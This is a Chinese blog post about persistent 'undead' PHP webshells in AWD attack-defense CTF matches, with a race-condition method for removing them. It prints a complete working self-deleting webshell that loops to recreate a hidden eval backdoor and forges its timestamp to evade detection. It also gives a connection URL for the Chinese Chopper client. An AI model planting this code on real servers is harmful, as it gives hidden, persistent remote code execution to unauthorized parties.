AWD不死马与克制方法

原创

春告鳥Cl0udG0d 2022-09-23 15:42:21 博主文章分类：网络安全 ©著作权

©著作权归作者所有：来自51CTO博客作者春告鳥Cl0udG0d的原创作品，请联系作者获取转载授权，否则将追究法律责任

一个简单的不死马如：

<?php 
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.3.php';
    $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval（$_POST[a]);} ?>';
    //pass=pass
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .3.php');
        usleep(5000);
    }
?>

在AWD比赛中，不死马对于维持权限十分有效。将该php文件上传到服务器，然后进行访问，会在该路径下循环生成名字为 .3.php 的不死马隐藏文件，菜刀链接：

http://49.235.230.115:18894/.3.php?pass=pass

AWD不死马与克制方法_修改文件

AWD不死马与克制方法_html_02

简单解释一下PHP不死马代码：

ignore_user_abort(true);

设置与客户机断开是否会终止脚本的执行，这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行。

set_time_limit(0);

设置脚本最大执行时间，这里设置为0，即没有时间方面的限制

unlink(__FILE__);

删除文件本身，以起到隐蔽自身的作用

while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .3.php');
        usleep(5000);
    }

while循环中每隔usleep(5000)即写新的后门文件，system命令用于修改文件的创建时间或修改时间，因为在AWD比赛中有的队伍使用

find *.php -mmin -10

AWD不死马与克制方法_php_03

检查十分钟内被修改过的php文件，所以我们修改文件日期稍微进行掩饰。

最后校验是为了防止自家木马被其他人利用（乌鸦坐飞机

<?php 
        if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){
            @eval（$_POST[a]);
        } 
?>

对于不死马，直接删除脚本是没有用的，因为php执行的时候已经把脚本读进去解释成opcode运行了，关于opcode有：

https://www.laruence.com/2008/06/18/221.html

个人感觉是内存或者缓冲一类的东西趴。

这里使用条件竞争写入同名文件进行克制不死马。

可以看到现在的 .3.php 文件内容仍为：

AWD不死马与克制方法_php_04

我们上传一个写 .3.php 的php文件，注意usleep需要比不死马小，$code修改为无害内容

<?php 
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.3.php';
    $code = 'hi springbird !';
    //pass=pass
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .3.php');
    //    usleep(5000);
          usleep(1000);
    }
?>

注意红框

AWD不死马与克制方法_html_05